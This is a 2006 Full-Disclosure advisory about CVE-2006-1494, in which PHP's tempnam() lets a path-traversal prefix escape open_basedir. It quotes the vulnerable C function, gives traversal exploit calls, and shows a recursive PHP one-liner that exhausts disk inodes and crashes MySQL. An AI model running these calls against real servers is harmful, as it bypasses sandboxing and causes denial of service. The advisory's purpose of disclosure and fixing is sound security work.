[Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2

2006-04-1000:00:00

vulners.com

JSON

Source: http://securityreason.com/achievement_securityalert/36

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:

-Written: 26.3.2006
-Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
— 0.Description —
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.

A nice introduction to PHP by Stig S?ther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam – Create file with unique file name

— 1. tempnam() open_basedir bypass —
In function tempname() are required 2 arg`s.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

So, if we have open_basedir set to /home, we can't create file over /home
directory.
In ext/standard/file.c (PHP 4.4.2)

-550-578—
PHP_FUNCTION(tempnam)
{
pval **arg1,**arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;

  if &#40;ZEND_NUM_ARGS&#40;&#41; != 2 || zend_get_parameters_ex&#40;2, &amp;arg1, &amp;arg2&#41; ==

FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);

    if &#40;php_check_open_basedir&#40;Z_STRVAL_PP&#40;arg1&#41; TSRMLS_CC&#41;&#41; {
            RETURN_FALSE;
    }

    d = estrndup&#40;Z_STRVAL_PP&#40;arg1&#41;, Z_STRLEN_PP&#40;arg1&#41;&#41;;
    strlcpy&#40;p, Z_STRVAL_PP&#40;arg2&#41;, sizeof&#40;p&#41;&#41;;

    if &#40;&#40;fp = php_open_temporary_file&#40;d, p, &amp;opened_path TSRMLS_CC&#41;&#41;&#41; {
            fclose&#40;fp&#41;;
            RETVAL_STRING&#40;opened_path, 0&#41;;
    } else {
            RETVAL_FALSE;
    }
    efree&#40;d&#41;;

}

-550-578—

if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}

Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir",
"…/…/…/…/…/…/…/…/Open_basedir_bypasswd");

tempnam("/home", "…/…/…/…/…/…/tmp/cx");

etc.

It is low issue but you can try create a lot of files and overload inodes from
HD.I have one particion.

/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <-
INODES

where mysql and apache try create some file. WWhen we overload free inodes,
system have big problem with apache, mysql.

Example:

cxib# php -r 'function cx(){ tempnam("/www/", "…/…/…/…/…/…/var/tmp/cx");
cx(); } cx();'
/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free

/var: create/symlink failed, no inodes free
… etc

/usr/local/libexec/mysqld: Can't create/write to file
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!

— 2. How to fix —
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
— 3. Greets —

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

— 4. Contact —
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/